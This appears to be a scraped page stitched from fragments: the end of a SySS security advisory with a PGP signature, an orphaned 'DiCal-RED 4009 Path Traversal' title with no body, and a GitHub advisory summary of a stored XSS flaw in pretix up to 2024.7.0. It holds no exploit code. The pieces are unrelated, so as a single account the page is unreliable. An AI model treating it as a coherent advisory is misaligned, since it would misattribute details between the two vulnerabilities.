latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgMACgkQnODkQEKd  
i5Z0/Q//URU2aC1Di8bK/CntBDFfjMk+fD0nXKwo7C/GSOy41y7xBlz9e9UzJKPP  
fI7fa8RQkbZDlDzpTQHXbvpSocbahWIM62B+c7uGm1EGZyejn7IpJUSbhRZHzKqM  
sNukpHq10p/AA6BJn4baFgfFIdV+HzXPAm3bkxovL3pUmMYVgFsfzuzpZ3wOqKbn  
M276mEmsBDG2Yi7HqWetqtYAjb35DVokrug+uT8DDe3SSE9V16iqo8EqMqMBXD7L  
aCvVnnVl1ElqJSsIyClyXLoKLcWbBN4zAUlb6f90PEeUtNt5/qhRiLDzprum8BYo  
7DhMz8MwOTTijNKRcYpVkOfPg1htmdUe5JqElktGcfNDj5YvU4KzG89srigHreJP  
yIVM+J0VX4fQ28cjKTS/qyXOAeIqJq//3/vbsgA3YNlP+IPBZYav8//HEPJD1PiD  
fBlwhQ7skn/EaCBi8EMatu7/xymA34rnTmmqS5+MCViWcTTB2+fF7H2xhZl1biHD  
DcVMVGgbNAdRIYFkJAh6qg0sXd1VOb8etAhFRQmMt5MeSK+ErbAIiaWTot2wwvbS  
jbTsEG+VL0HTIfEI/utghGDB+044hJceEyaqRJ/qq/3Zx1C13ZsKLPeXZaMoeEWM  
1nYLOJFL/R/i+UjFsFzxDG/IcbionJYOTvULa4vPafdZQ6Yol80=  
=BeZD  
-----END PGP SIGNATURE-----

DiCal-RED 4009 Path Traversal

Stored XSS in organizer and event settings of pretix up to 2024.7.0 allows malicious event organizers to inject HTML tags into e-mail previews on settings page. The default Content Security Policy of pretix prevents execution of attacker-provided scripts, making exploitation unlikely. However, combined with a CSP bypass (which is not currently known) the vulnerability could be used to impersonate other organizers or staff users.

**pretix Stored Cross-site Scripting vulnerability**

High severity GitHub Reviewed Published Aug 23, 2024 to the GitHub Advisory Database • Updated Aug 23, 2024

Tag

#vulnerability